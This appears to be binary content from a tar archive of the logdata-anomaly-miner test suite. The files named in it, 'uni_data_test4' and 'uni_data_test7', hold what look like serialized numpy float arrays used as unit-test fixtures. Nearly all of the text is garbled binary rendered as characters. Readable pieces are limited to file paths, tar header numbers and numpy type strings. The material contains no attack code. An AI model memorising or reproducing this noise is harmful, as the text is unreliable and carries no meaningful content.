w??g~?W%?.c@k?kcPc_???o|?S?,+ݚ?o?HWul?({X-?3D£?#/W?_?h ?7?Ѣ?XaDު???o4Ԯ?-ч4?"OeF??6ɱ? 2?ק^?cn)?6y?I ?Ո??R?Tj?p/c? (]+?d]V?.|?sAG?;з?}@-ܼ?rq?gBq?\eZ;?)r?tZ=h?Bx?<+2?|?W(?3hcb?̞?/,?uœ?O?j|[n\?WV?_3#?'?';?Tv?NV?I?|&!?>Xza?3ޙ?3BP?j?( SM?m;?}#?X5 J?48?s?`Ůz?ĭ?($E?t}~_?Xf?i4TOt?7?^ K???S ?}Gn?HY6?aո?9IVO?uk?c1?WQϥ.???,3iL?e?Lv? A?^?,|I??/U?x?5v&F?cX-y?Q˫?l?th?)-? ]C?R@v?aEި?䵹{?-?@?VKTs?ш?vr, ?Jd=? RE[gp??w?-C??۷?? ,:?>zm?xp?4Ң?q7?l8j?)jY+?v?dAf?aR5?@2*g?-d>??2?+od?]Q?KW?ˌ?ƛ?*/?%a?d?R?x@=,?4.^?Qmx? ?mU?>[?J?a|&)??ۉd&?wY?VeD?@?.Sw#?K V? >|?%Pm?G'ܮ?4y?? ?4BZ#?L|??m0?Zl?Q&?Hk???v6-U .?U-FXG?4$_ɦ`?=D??±?k0?k%?J ??TkD?X]?Ŀqw?W?`??հC?j?%?v9~A?mRSZ?wdk t?3R?I;??V?-j ?$$C%?l3ޑ>?( eR/q?~ ~??:j?a ??iV"?ET?ۭ^Bn? ?w.?49?w?d&h8?[?"R?jIq?)7 B?.Đ?8.?|?_9gO?j۷?ۜOU?ҵ ?w}A?32?Kf|e?}?lwN?Jn?\|?I,@I?7^e{??%{?M??V>_?pd@??L{?K*?Qv?nc?_\??~ @\,@>R@W)l@|@%e@\vd@QZ@@P@+FC@<%QY@;

UUU6G(rXG+ީG?9T\G#EG?ޚzG4ĶF0G?/dG?H8G㢖68G?zR~~G(5sG?$G?IjKGܳG?HG?D%gGhuG?1ОG?D1MtG*cuG4lG?LtG?˭qKG?,Q ,Gīˢ:Gmb/G?6UNG?[`gGG?#cGę+0G @G?uG}!DG?UG?b;%\GJ{G?$zOG? ŞTG?snGc()G?Բ\G?oUү GoYGG?]VG?'Ew2G? `.IQTG?^f$GNG| dG?Ģk ҙG?s8\mG?cuX2\G?@G?ӗGɈwGGӽ3t#XG?5R"G?#FG?Q gOPGKG S0G?ĺG?GZ8G? =VG?w_rG?NXĄGҦ&͂Gv]EGoW@,G?U6gdNGݓ|f~GjbzGSLl GՅ/+cG} EΨG?`&]:G?߄HGAu?zG?i# (G?,I*G?lA@G?NG?ɥw}KGftG?Į:GLrPG?g}ҲGDG?ғьG?X(z6Gֺ{GG?ux`JGԁ\G뮢a(G?ڑG}G?(>#)G*ѳTG?}gPG?_DG?3]wG?sFG?ώwT(GcU@Gd20XG?Gt-zGL*m{G?\\6CZG?xxfG?0( GJ@(G?ḿ( mlG`lG&Ç5̺G EGS;0GxQG?)_W6GɈ\PGdt=GRTG?RG,~G?>#x3bG?vG?Ꭲ&GEt[ GĐ(G?\ G_ G?3yG= @G?;:G?zV*6G?̤A4P|G6G?[G!dGK53iGσ;G?FDG?$&CŔGBli?rGrW$G?кjM{G?'C/\G+0.7.Gp[7G ŔAG?\IjG?ÞLG?ТGHDG? rpTGPB`GMGo+XG?ЁG?}PGª2hG?;yPG7cG?M4 ;`G=]fsv(G@֩G 0G?M}͵G?ϧ[G#0+GO'3G?_VG?)dG?件gG?uG?0I(G?g(GsdGڊG?җ[VG? 8DTG6[u atG?rhG|dTGݧقG?(4G?&1 G?H_RG?Y G?$GG?[8>.G~8G @QyG@vG?XIVG?GI4ԤG?3U4G?jInG^'GNMGTG?rtGŀYB8G֤dopG?ledG?ߩtG?FNqG?Џ@!G?\ 9 Gpk.G~mfMG?1&%GnvG?0G?tКGl?as@G0fG?#OxGB X`G?sųG?KzXG?U[G]ƁG֒&<GsG[9oGʈG/\GgRhG viG?Ff@G?VG?hMˆ5G֔gTG?]^PG٦zGԂE8GncGG" G[GuW6.G?&t{RG??NNG?UpG?-PG?a gwGֻJ\G&gG?TrG6)JGcIG? G?eGwF`G?!wގG?=G?D1V:G#1: GijRLG?ՙhwG?vG2K%sG?"xG;9;G?V0GԺ|G֠$ G?15hG?M/S_GЛ(UG?#G8,TUG,0G?S`G#[$G?:dG?߉HKGVGWCwGѵq0G? ]hG!DLPG?͊ G?Ҕq$G?9DG?:Rh6Gzl%G?kFTG?ﳞG?YӀA8G?ED G?_uIDG?Щ>GylG? 1 G?3lG?8 @UG?u8G?(G?HMG? |xG? ]&kG6@G?KꂭG ɔ G?꽱))aGž;G.EG|uuNG?sQ;tG?h=kHGȿG?>5XG? vʀDGUnG?ڌE*GT7PG˲ϞGٹa`xG dRG;@odG'3G veTG?m*NGnG?UXG?ொG?߶{\G!KdG?&~G%G?(|$rG?eOn(TG?IuG?^GؕEuGռQ G?MJG?`\lXG?zHGĎKG?&)ǮGJk G?qlHGض.#DGc@tGsVKhG5tG}vG?i G?0G?[*G?{%XcG?.G?2 !G_lG?wb VGueG?tʔGፗ:G?&G?г̒1\G :ʁGQ `G?֯UU$Gҗ()Gޜ*G?zG?re>@G_RG?@GxkG?mj1nG*G`ў$G^G?vKGQw?Gy)G?V@G ?jG? U.HG&GH4ěVG?- G|Gxe G?f2G,vG6GSaiG? |G?+(GAnpG?cǝGHGdԸG?T]GdG.I1GXGS/PG?XG.DGZWĠG:lG.G?d;nGMB_rG?{-YGX|g.YG?y˜G~b GW!dXG?qq%G?eeJvG7? :G G@G?ҡ GfG?(7sGN G?jӍ{*G?4G!G?]G?kG7$HG?;G?VGײa+G?2ge(G?^$G?lIJGJXG5wG?R\ GG;TN@G,0G) ,G?ߌc<:TGA!G?.#GoAǂ 8G?)kG?ͬ[yG?vָ(G?uG? ӇEG?3GT3 G?Hn}G1GG,OGyZlG?_M?G?X6A6VG?(\cKG @GG? G?0®GG?ܒ#:0GN@G?~S~G?S&A8G?ҫgGM]G?ff <_LG?"+vHG1c@G?-4G8`G?!"aGvϤdG? 3 G??DG? GyȾ#GY @GɒGRȨ8G?@[EG?|9G?ςqa`G?`G?狅PG?#GgG?F"`G?O٠%G>VGc- G?V`G?@ G?@*.&Gv/`Gk3G%Gb +{5GkjsbG?ыG?)xTG{kG?G5nGyMG%-G?젽PG?j+G?㏄ dD0G\5Gfu >G姖閠G?MH=G҆CP˔G?3%ݘG?u.NtG?iXG? l, tG?/5HG3w G"<G$w}GOIGvBD@G??"*G؀,GУ=+ xG?m:IG?~0G8@G?OhGcpG2G?a^UG޺GQ8vGOCG?l@=TG?{G?=H*G?J)6LG՘3hGi@G?d8o`Gd"Խ`G?hG?1O4G|3YG?QG?ʽlxG?΢KHGJ4ѠGȈ*GpG?VA#G.DG G?ke`,G?LG?sE~G% G?H/G?lG?( >:G?/%tG&G?sG?m|E G?伳/G?〲XG?ԕw\G?ݏl$xlG%JG* CjG? :J@GNG?g&5GZ-@G]G،zƄG?YK>G?♓G?OXkGJGX%G?ZyG?c;_KAG? tGHs2G =G0$ G׸~\!G? R]G-XrRG޷9A@G?ŸKLGrG'cG?a4/lG?hOxHG?_<8G?ٔ~'GLXG?FF G? Nc"Gɢ>|@GF nG?Н0Tz%GpfdG?s" G?) z^G?)bG?K8G?OFG?Y[%a4GXlG[rn G=|G? ` G?ã9nGj! G%BȐGN7G?9+0G?[(G? `GxG?ꍘd*G?v pG?–8G?yF`fG?LdG?wG?ԠyDG?\-ͰG;G?ŠzĠGLG?Am&0G?&jG{GN#v0G?E>`RG?i(G? G7Gj[G?ZLGn~eBGXFG5n7gG?^wtG?kYG?f`,G?s-GG?^G?[m ;GIrC?G?"G*BbG58bˈG|ڴXGL> `GH_Gp*ҜG꿞lG?ЯG?|G?l rG?1G̞0G?IGT FG%t" iG?4XG?8B/5FG:/؊|G?⁆gG?WlrG? G?e:G֥4Gq,G?AzG?ƬiWXG)+GU.GdG3G?̔^Y,G?ʂy1G?܇~G?o'Gj:X8G?JG4Gou@G? ^G?ԽGڛ ڄ!$GYd}G?I{|G?h(4G? 2G0BG?ف/\@G5G= GG?EG?[dG?Q<#Gg @NG--G?ߨ,G9)b`G?OYG稀2GӘuG? ֩EG?7G?×^<*G?CLsvG>SG׳ Gxn8%G?|GVuGتiG?#"pGk6bG#割`G+ʼG?z2(G7JVOGN;a*G / G?Ha-G?GV!BeG?'~@G?DGUxdkG?(=pNG?3"+GlG?܆,"G?NG?V:G?M64|GM6.G?v ^GJGctGs4G則%G+(S|eTG?[9G?u`G+G?b+VPG?GEGk;0G?T"G?3A5%0G?1\G?NaRG?u1OG?覮ƯGJ\8PGl pG?ª G?-qG?UBNG?V>\G?ݷɦG EȭG&GeeQ G3``GI!lG?&-\G?&G32G@PGb5G(f"G?s".G?ߍ-~PG?k^}rG?pe`G?5RhOG)RGG'暡G^GGŠG?ǠGg!`>G?%WFG?=G?ӻ juG?{hźG?B5GAGΙcpG?èG?5MGvzGAGߥ0G6kGR6G?սŅDG?5S Gْ[WG?lًG=24LGO_|`G?)YxG{sG?6˾G?຋7G?K*GSi/ `G?9NGŸXGGGrhG?vGG?m-G?QhG,DG yWdG?rGئGRyGTB>G?yG?VG?K4nG?r.YEKG?G<G?⌉uG3s xG?xgȐG?r0G?G?ADR:GhJFG?aHvG?!)wG?ĶMTf8Gop$`G? 6v~G?Ҧ'G#xN(GࠝY G?+`|G?) BGxw[G?SeCG?=UvGr(eG;4xG? BNPG 5ŨGd7 PGwKXG?ȀVEGA$5АG?|VoJGǩjGTJN\G?G&zGX|ŸG?SMDG?7V{ DGZtG?nA5 GN G?c*%G?#݀G?GDgÖG?ɢa`G?_1G?KG5T5G?y@GxCJ5^G?W~HG?>Gƕ9lMhG8GߩN5)G@G v"G?jkϧxGb=Gɖ:7 GtPG?ꤛG?-TG[LGDG~cSnG?AxWlGຩG?ۙ;'G遵mVG?wkNPG?0c'@G?G礶ʀGŗl3G5^2G/&GLMG?[4G ;`Gp$ru#G?#G8G? Q GyYz7G$⻬G?F=,8GdG?*G?AG?xuG?ٌkxG}G猔z[G?S,vGԂG?}TzG?&rBG?*()xG?;G?,;G˭T@G?DG?Cxu@G|"#(Gy0Gj-"G?wO}GnG֫5Z@GΉXUPG?Y#GGWyG綒#G?(ЅUjG?B%A{eLGaNPM4G? dP*G?QAf2G?7=ZeG??_Gź}UpG܍>GsG?Sk:G?5DvØG?w͛,G?P[GtG#^G?[cGP &)GTtG?+GǢG?rgXGu3G?삗5PG?:$FpGMƆĵvG?~)LGޠG?A(~G?mP0G|`G(`GUX9G?PTp$G!{G?pG?_աG?⣘坈G?hG?Qf`*G?౟2G?WyGRu,G?tG?8wG➰4Gեh]\G?ɶ|Z{@GG?-5WG?5:WGX@Gݜ)GV(b٤G?i^%|@G?Ъ$iG?b*vOqDGLG?%sG?a=G~^/GJ|FlG?֎65G? ckzG?剛RG?qRQGR GLGVouNzGfGTG?!eLG?GAGFG?? )G?phG?RG#0Gw|VGQVG?ד"AG? pGفTe](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/uni_data_test4000066400000000000000000000232541437606560100273230ustar00rootroot00000000000000&](JjYJsJ( JJJ8JJJw J{J׃J6JJJcJ+ Jt JJ? JEJVJǹJ@JJ\ JJ:MJpJxJ J JJ"JJܮJ:Jw]J;J-[JPJG+J J4JJ J6J%|J J JKJ`|JwJˎJ%iJJJ@ JeJXJ JJ~ JhJJkJNJ JJJ$~JHJ3XJg| JJu7J JXJ2J JJJJJ'J JVJuM,JE7JbJ9J%J\JQ{JJJN~ JLJJJJYJպJ!JgJs#J1JJ1uJk_JIJJ~JmJgmJJTJ7JJ$J]M&Ja JzJJ J5aJJFJJoJJXJ J3 JJEJE)JJ& J J)JJJJqJKJJJJƟJJJLJ9JSJJ- JcJJJ J(#J J4JrJMjJS| JbJq J/J[0JJ JJgJJJ4JJJJ( J_JmQ JJJ\JJgJJJ"JϧJ\JAJqMGJ M JJaJQJ=JkSJJ|JJ&J MiJJv J1>JJeJХ JJRJMd)J]RJp Jq(J{jJS\J(aJm&J JJJ7JtJJJeJ#Jr JJJW J JwzJuRJIJPSJJ:JJB JJJJJ JJSJ( J-5JJcJJ}J҄JJ-JJJMJ+J\JJbJJ3AJJJJJzqJJ_JuJ26JJJ6 J$J# J JPJg JR&JdJJ]JJ'J bJFJjVJ>JpJ JCJAJJJPO JJy J:IJ\ JUp Jb JJw JfJJJ JJJJ/J JiJeJwJLJ JkJJ J JJ J+J JJJ JSJ Jb?JsJ3iJJyv J_J=JfJ{ J=J JbJ"JJوJM]J~JdJxJ HJJ9J%: JH JJJ/tJCJJJB JVJzJJcJ JJ.-JJu JdJ?JwJJ* JS JgJ9JJkJKJ JJ|<J^ J'J?JTWJ5JJ"J7JƋJJsJ' JJJ,JyJږJ9JP JJtJ)J_sJi JMbJTJNJ8JX JBOJ J JpJ oJJJ/J5JMmJJĹJ"J7JG Jp JFJɏJ JJA&JxJ JJJJۤJ8J J'kJ1JMJJJ=5JJ=eJh|JJuMKJ22M_JJ:wJZJ J̙Jq J"CJJ)- Jn Jn JJ,J" JجJKJ J:JJ)JIJiYJ[J6 JJ#T JJ J J<JJJGJJq J;VJmJ7 J`JfJ^J J*JJ J JSJJJ J JKJJlJJ: J JbJJJ; Jy JJ Jlw J4JwJZvJJ;J1J? JRJSJHJ J pJ JuJ\ JNJ`J2JJJJ}J\MFOM]J2JJlJEJ? JNJnJsJJJJv;JJXJQ Jd J J*6J]JJJ{JeJáJ> JCJعJbJ;JLJFJ Jn&JJEJPIJJͶJJ@ J>J2| JsJFJFJ!)J JJJ' JJ1J4JtJJMrJJZJ\MJ1gJiJ\JJ7JTJJy JδJlJ^ JRJJ(JhJ41JIJuJwb J)*J J5J J= JJgJ_JJJ}J > JJJNJ*JJJG JNJh J]]JJZJpJJWJJAJ J Jf JJocJI~JKJ=JοJB4J J JN JT:JwJU7J$JUUU6G(rXG+ީG?9T\G#EG?ޚzG4ĶF0G?/dG?H8G㢖68G?zR~~G(5sG?$G?IjKGܳG?HG?D%gGhuG?1ОG?D1MtG*cuG4lG?LtG?˭qKG?,Q ,Gīˢ:Gmb/G?6UNG?[`gGG?#cGę+0G @G?uG}!DG?UG?b;%\GJ{G?$zOG? ŞTG?snGc()G?Բ\G?oUү GoYGG?]VG?'Ew2G? `.IQTG?^f$GNG| dG?Ģk ҙG?s8\mG?cuX2\G?@G?ӗGɈwGGӽ3t#XG?5R"G?#FG?Q gOPGKG S0G?ĺG?GZ8G? =VG?w_rG?NXĄGҦ&͂Gv]EGoW@,G?U6gdNGݓ|f~GjbzGSLl GՅ/+cG} EΨG?`&]:G?߄HGAu?zG?i# (G?,I*G?lA@G?NG?ɥw}KGftG?Į:GLrPG?g}ҲGDG?ғьG?X(z6Gֺ{GG?ux`JGԁ\G뮢a(G?ڑG}G?(>#)G*ѳTG?}gPG?_DG?3]wG?sFG?ώwT(GcU@Gd20XG?Gt-zGL*m{G?\\6CZG?xxfG?0( GJ@(G?ḿ( mlG`lG&Ç5̺G EGS;0GxQG?)_W6GɈ\PGdt=GRTG?RG,~G?>#x3bG?vG?Ꭲ&GEt[ GĐ(G?\ G_ G?3yG= @G?;:G?zV*6G?̤A4P|G6G?[G!dGK53iGσ;G?FDG?$&CŔGBli?rGrW$G?кjM{G?'C/\G+0.7.Gp[7G ŔAG?\IjG?ÞLG?ТGHDG? rpTGPB`GMGo+XG?ЁG?}PGª2hG?;yPG7cG?M4 ;`G=]fsv(G@֩G 0G?M}͵G?ϧ[G#0+GO'3G?_VG?)dG?件gG?uG?0I(G?g(GsdGڊG?җ[VG? 8DTG6[u atG?rhG|dTGݧقG?(4G?&1 G?H_RG?Y G?$GG?[8>.G~8G @QyG@vG?XIVG?GI4ԤG?3U4G?jInG^'GNMGTG?rtGŀYB8G֤dopG?ledG?ߩtG?FNqG?Џ@!G?\ 9 Gpk.G~mfMG?1&%GnvG?0G?tКGl?as@G0fG?#OxGB X`G?sųG?KzXG?U[G]ƁG֒&<GsG[9oGʈG/\GgRhG viG?Ff@G?VG?hMˆ5G֔gTG?]^PG٦zGԂE8GncGG" G[GuW6.G?&t{RG??NNG?UpG?-PG?a gwGֻJ\G&gG?TrG6)JGcIG? G?eGwF`G?!wގG?=G?D1V:G#1: GijRLG?ՙhwG?vG2K%sG?"xG;9;G?V0GԺ|G֠$ G?15hG?M/S_GЛ(UG?#G8,TUG,0G?S`G#[$G?:dG?߉HKGVGWCwGѵq0G? ]hG!DLPG?͊ G?Ҕq$G?9DG?:Rh6Gzl%G?kFTG?ﳞG?YӀA8G?ED G?_uIDG?Щ>GylG? 1 G?3lG?8 @UG?u8G?(G?HMG? |xG? ]&kG6@G?KꂭG ɔ G?꽱))aGž;G.EG|uuNG?sQ;tG?h=kHGȿG?>5XG? vʀDGUnG?ڌE*GT7PG˲ϞGٹa`xG dRG;@odG'3G veTG?m*NGnG?UXG?ொG?߶{\G!KdG?&~G%G?(|$rG?eOn(TG?IuG?^GؕEuGռQ G?MJG?`\lXG?zHGĎKG?&)ǮGJk G?qlHGض.#DGc@tGsVKhG5tG}vG?i G?0G?[*G?{%XcG?.G?2 !G_lG?wb VGueG?tʔGፗ:G?&G?г̒1\G :ʁGQ `G?֯UU$Gҗ()Gޜ*G?zG?re>@G_RG?@GxkG?mj1nG*G`ў$G^G?vKGQw?Gy)G?V@G ?jG? U.HG&GH4ěVG?- G|Gxe G?f2G,vG6GSaiG? |G?+(GAnpG?cǝGHGdԸG?T]GdG.I1GXGS/PG?XG.DGZWĠG:lG.G?d;nGMB_rG?{-YGX|g.YG?y˜G~b GW!dXG?qq%G?eeJvG7? :G G@G?ҡ GfG?(7sGN G?jӍ{*G?4G!G?]G?kG7$HG?;G?VGײa+G?2ge(G?^$G?lIJGJXG5wG?R\ GG;TN@G,0G) ,G?ߌc<:TGA!G?.#GoAǂ 8G?)kG?ͬ[yG?vָ(G?uG? ӇEG?3GT3 G?Hn}G1GG,OGyZlG?_M?G?X6A6VG?(\cKG @GG? G?0®GG?ܒ#:0GN@G?~S~G?S&A8G?ҫgGM]G?ff <_LG?"+vHG1c@G?-4G8`G?!"aGvϤdG? 3 G??DG? GyȾ#GY @GɒGRȨ8G?@[EG?|9G?ςqa`G?`G?狅PG?#GgG?F"`G?O٠%G>VGc- G?V`G?@ G?@*.&Gv/`Gk3G%Gb +{5GkjsbG?ыG?)xTG{kG?G5nGyMG%-G?젽PG?j+G?㏄ dD0G\5Gfu >G姖閠G?MH=G҆CP˔G?3%ݘG?u.NtG?iXG? l, tG?/5HG3w G"<G$w}GOIGvBD@G??"*G؀,GУ=+ xG?m:IG?~0G8@G?OhGcpG2G?a^UG޺GQ8vGOCG?l@=TG?{G?=H*G?J)6LG՘3hGi@G?d8o`Gd"Խ`G?hG?1O4G|3YG?QG?ʽlxG?΢KHGJ4ѠGȈ*GpG?VA#G.DG G?ke`,G?LG?sE~G% G?H/G?lG?( >:G?/%tG&G?sG?m|E G?伳/G?〲XG?ԕw\G?ݏl$xlG%JG* CjG? :J@GNG?g&5GZ-@G]G،zƄG?YK>G?♓G?OXkGJGX%G?ZyG?c;_KAG? tGHs2G =G0$ G׸~\!G? R]G-XrRG޷9A@G?ŸKLGrG'cG?a4/lG?hOxHG?_<8G?ٔ~'GLXG?FF G? Nc"Gɢ>|@GF nG?Н0Tz%GpfdG?s" G?) z^G?)bG?K8G?OFG?Y[%a4GXlG[rn G=|G? ` G?ã9nGj! G%BȐGN7G?9+0G?[(G? `GxG?ꍘd*G?v pG?–8G?yF`fG?LdG?wG?ԠyDG?\-ͰG;G?ŠzĠGLG?Am&0G?&jG{GN#v0G?E>`RG?i(G? G7Gj[G?ZLGn~eBGXFG5n7gG?^wtG?kYG?f`,G?s-GG?^G?[m ;GIrC?G?"G*BbG58bˈG|ڴXGL> `GH_Gp*ҜG꿞lG?ЯG?|G?l rG?1G̞0G?IGT FG%t" iG?4XG?8B/5FG:/؊|G?⁆gG?WlrG? G?e:G֥4Gq,G?AzG?ƬiWXG)+GU.GdG3G?̔^Y,G?ʂy1G?܇~G?o'Gj:X8G?JG4Gou@G? ^G?ԽGڛ ڄ!$GYd}G?I{|G?h(4G? 2G0BG?ف/\@G5G= GG?EG?[dG?Q<#Gg @NG--G?ߨ,G9)b`G?OYG稀2GӘuG? ֩EG?7G?×^<*G?CLsvG>SG׳ Gxn8%G?|GVuGتiG?#"pGk6bG#割`G+ʼG?z2(G7JVOGN;a*G / G?Ha-G?GV!BeG?'~@G?DGUxdkG?(=pNG?3"+GlG?܆,"G?NG?V:G?M64|GM6.G?v ^GJGctGs4G則%G+(S|eTG?[9G?u`G+G?b+VPG?GEGk;0G?T"G?3A5%0G?1\G?NaRG?u1OG?覮ƯGJ\8PGl pG?ª G?-qG?UBNG?V>\G?ݷɦG EȭG&GeeQ G3``GI!lG?&-\G?&G32G@PGb5G(f"G?s".G?ߍ-~PG?k^}rG?pe`G?5RhOG)RGG'暡G^GGŠG?ǠGg!`>G?%WFG?=G?ӻ juG?{hźG?B5GAGΙcpG?èG?5MGvzGAGߥ0G6kGR6G?սŅDG?5S Gْ[WG?lًG=24LGO_|`G?)YxG{sG?6˾G?຋7G?K*GSi/ `G?9NGŸXGGGrhG?vGG?m-G?QhG,DG yWdG?rGئGRyGTB>G?yG?VG?K4nG?r.YEKG?G<G?⌉uG3s xG?xgȐG?r0G?G?ADR:GhJFG?aHvG?!)wG?ĶMTf8Gop$`G? 6v~G?Ҧ'G#xN(GࠝY G?+`|G?) BGxw[G?SeCG?=UvGr(eG;4xG? BNPG 5ŨGd7 PGwKXG?ȀVEGA$5АG?|VoJGǩjGTJN\G?G&zGX|ŸG?SMDG?7V{ DGZtG?nA5 GN G?c*%G?#݀G?GDgÖG?ɢa`G?_1G?KG5T5G?y@GxCJ5^G?W~HG?>Gƕ9lMhG8GߩN5)G@G v"G?jkϧxGb=Gɖ:7 GtPG?ꤛG?-TG[LGDG~cSnG?AxWlGຩG?ۙ;'G遵mVG?wkNPG?0c'@G?G礶ʀGŗl3G5^2G/&GLMG?[4G ;`Gp$ru#G?#G8G? Q GyYz7G$⻬G?F=,8GdG?*G?AG?xuG?ٌkxG}G猔z[G?S,vGԂG?}TzG?&rBG?*()xG?;G?,;G˭T@G?DG?Cxu@G|"#(Gy0Gj-"G?wO}GnG֫5Z@GΉXUPG?Y#GGWyG綒#G?(ЅUjG?B%A{eLGaNPM4G? dP*G?QAf2G?7=ZeG??_Gź}UpG܍>GsG?Sk:G?5DvØG?w͛,G?P[GtG#^G?[cGP &)GTtG?+GǢG?rgXGu3G?삗5PG?:$FpGMƆĵvG?~)LGޠG?A(~G?mP0G|`G(`GUX9G?PTp$G!{G?pG?_աG?⣘坈G?hG?Qf`*G?౟2G?WyGRu,G?tG?8wG➰4Gեh]\G?ɶ|Z{@GG?-5WG?5:WGX@Gݜ)GV(b٤G?i^%|@G?Ъ$iG?b*vOqDGLG?%sG?a=G~^/GJ|FlG?֎65G? ckzG?剛RG?qRQGR GLGVouNzGfGTG?!eLG?GAGFG?? )G?phG?RG#0Gw|VGQVG?ד"AG? pGفTe.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/uni_data_test7000066400000000000000000001575111437606560100273320ustar00rootroot00000000000000>](](numpy.core.multiarrayscalarnumpydtypef8KKR(KRhh C| ᅯRhh CU.h?Rhh Cz)!?Rhh Ct??}?Rhh C(~@On߿Rhh C0vRhh C ?Rhh C=?Rhh CPwFϿRhh CXlr$ϿRhh C`"`ImRhh CO㿔Rhh Cuu翔Rhh CP޿Rhh C`~5%?Rhh CPȿRhh CܕRhh ClKK⿔Rhh CVkhp8?Rhh CI>?Rhh CJ?Rhh Ch翔Rhh COT:?Rhh CT7=9ٿRhh C@F?Rhh C(?Rhh C?Rhh Cr16m?Rhh CO޿Rhh C,{'?Rhh CzDBW?Rhh CߙK鿔Rhh CIS忔Rhh C6'ES=翔Rhh Ca=?Rhh C6 WᅯRhh C6Q艻?Rhh C$a"R[濔Rhh ChWW?Rhh CbORhh CM-̿Rhh C\l'y?Rhh C +tuRhh C|t/տRhh C$B/t?Rhh C0[v>ϿRhh Ca-޿Rhh C}{W?Rhh C\%eGԿRhh Cr:<6܈?Rhh C鿔Rhh C?Rhh C DlۿRhh Cs/l?Rhh C@ ǿƿRhh CvǚIc?Rhh Ch 濔Rhh Czz῔Rhh CKLhoԿRhh C2 mRhh Ch P _ԿRhh Cj3R1?Rhh CbJ+GӿRhh C8SܿRhh C>9V῔Rhh C,7"ݿRhh CnGݿRhh C*返Rhh C.-FbhRhh CRN㿔Rhh CNꮯ3?Rhh CN뿔Rhh CDs&)l?Rhh CpnKѿRhh CN~J;濔Rhh C`:Xi颿Rhh C@ܿRhh C_w\?Rhh Cو.?Rhh C3 ?Rhh C^Us1뿔Rhh C O){jRhh C$+7 `?Rhh CL?Rhh C'㿔Rhh Cn?Rhh Cn?Rhh C0*_꿔Rhh C¢ ?Rhh C꿔Rhh C|7]ӿRhh CX1CܿRhh Cۉ?Rhh C:.?Rhh C軨U?Rhh CIO?Rhh C8ÿRhh C>k?Rhh C^W5e返Rhh C`J?-?Rhh C֖K῔Rhh C(w5b?Rhh ChS?Rhh C`"gտRhh C<_濔Rhh C k @a返Rhh C4῔Rhh CZ:ҿRhh CN9Y?Rhh C\D?Rhh C&Rhh CgѷY?Rhh C %?Rhh CP8?Rhh CzŤ<ᅯRhh Cz ?Rhh C!P_?Rhh CVQ?Rhh Cf?Rhh CʎǭJ?Rhh CB]Rhh C0DѿRhh Chx+?Rhh CL?Rhh C?Rhh C C_SǿRhh Ch Z ?Rhh C ?Rhh Cr;Rhh C8ܿRhh C,t.?Rhh Cl'ۿRhh Cz?Rhh C([>Rhh CyG9?Rhh C??Rhh C`Rhh CXH?Rhh C 0k?Rhh C < {?Rhh Cq]~QRhh CӪ7?Rhh Cc~῔Rhh C"R?Rhh Cu87~鿔Rhh Cy%Rhh C̗g/Rhh CxݿRhh C?ӿRhh CYbj῔Rhh Cܴ?Rhh Cn7?Rhh CHwh?Rhh C)OܿRhh CvM,?Rhh C~ 5㿔Rhh CD ~ܿRhh C sBn?Rhh Cik⿔Rhh C( 4GܿRhh CY3ᅯRhh C( gVؿRhh C0q~o?Rhh CW}?Rhh C0zۦRhh C$H쿔Rhh CItֿRhh C$rؑ?Rhh C W亘ǿRhh C|?Rhh Ci ?Rhh C'K?Rhh C7E?Rhh CL^M$?Rhh C߅0?Rhh C῔Rhh C76p?Rhh CcMRhh Cˆ?Rhh Cx]??Rhh CжWಿRhh C|2s ?Rhh C,k.翔Rhh C0`dcпRhh CD[?Rhh CxځaĿRhh CY 俔Rhh CLZL4oRhh Cr*K?Rhh Chw?Rhh C 7鶼Rhh Cx~_6?Rhh CSxRhh C>R@?Rhh C5PcRhh Co|Iy??Rhh C`Q+u*ſRhh C&ʿRhh C>4J࿔Rhh C(c]?Rhh C&5¿Rhh C ſRhh C}¿Rhh Cߎ1e?Rhh CH?Rhh C`NRhh Cy]?Rhh CC?Rhh C$`(࿔Rhh CRTpJ?Rhh C/X"ٿRhh CWhw)k返Rhh CX|K?Rhh Cp<ӎ?Rhh C̦݇Rhh C3}?Rhh CbO俔Rhh C:{?Rhh C/ҿRhh Cxr~濔Rhh CPs6ۿRhh CB?Rhh CK>꿔Rhh C,m?Rhh C0HK2?Rhh C潓}?Rhh CSS"8=?Rhh C/AY?Rhh CPX%?Rhh CJ88⿔Rhh C`_դ߿Rhh C-I?Rhh C0K?Rhh C8z+鿔Rhh C7tij࿔Rhh C B"mᅯRhh C_rI返Rhh C(V ?Rhh CT9ݿRhh Cb?Rhh C)ꙫ4⿔Rhh C{_ ?Rhh CD]=?Rhh C,͡eRhh CH"Y4?Rhh C(Zn?Rhh C`?Rhh C<@?Rhh C&gRhh CE|?Rhh C ?Rhh CP~>9ܿRhh Cp=v῔Rhh CLRm俔Rhh CRٖɢRhh C` ?Rhh C`)8ȿRhh C`zٿRhh C-a鿔Rhh CKᅯRhh C0V?Rhh Cd9[㿔Rhh C9wc?Rhh Cf[/返Rhh C>lοRhh Cy?Rhh C` h?Rhh C)t܆Rhh C~?Rhh Ct>?Rhh CT<пRhh CJd@c쿔Rhh C1ɥ?Rhh CD?M濔Rhh C0k"?Rhh CzE?Rhh C^=?Rhh C*ܿRhh C~j:/[?Rhh CɘRhh C|*返Rhh C~V?Rhh C5bgοRhh C;\-翔Rhh C3Ę'?Rhh C:O返Rhh Cjwր+鿔Rhh C쨟ٿRhh C ¯0'?Rhh CTɿRhh C뇆u?Rhh CZ|_俔Rhh C@դտRhh CH鿔Rhh C:ֿRhh Cs ?Rhh C(sϿRhh Cl|aYܿRhh C 忔Rhh C=ƶ忔Rhh C‘?Rhh C+6:ǿRhh Ch俔Rhh C4F?Rhh CPxu|[?Rhh CD+W?Rhh Cf]m*?Rhh Cv?Rhh C A?Rhh ClxV޿Rhh CV7Rhh CY俔Rhh C~V ?Rhh Cв7ſRhh C4eRhh Cv8?Rhh C`ٺ?Rhh CXB3翔Rhh C5T 'Rhh CVP;qRhh C>\1ϿRhh C䇝8?Rhh C: [a?Rhh C5|$쿔Rhh C՟?Rhh C 3|)Rhh C?Rhh CC ZdsᅯRhh CL]^Rhh C􄶯ҿRhh CQCҿRhh Ce?ۿRhh C@EwDۿRhh C<=?Rhh Cb%xY濔Rhh Cҋ?Rhh C|{R?Rhh C?Rhh C-Y俔Rhh CPgŅV{?Rhh C:g|῔Rhh C^s?Rhh CO?Rhh C,^H|?Rhh Ch_bJ?Rhh C_࿔Rhh C0!=ƿRhh 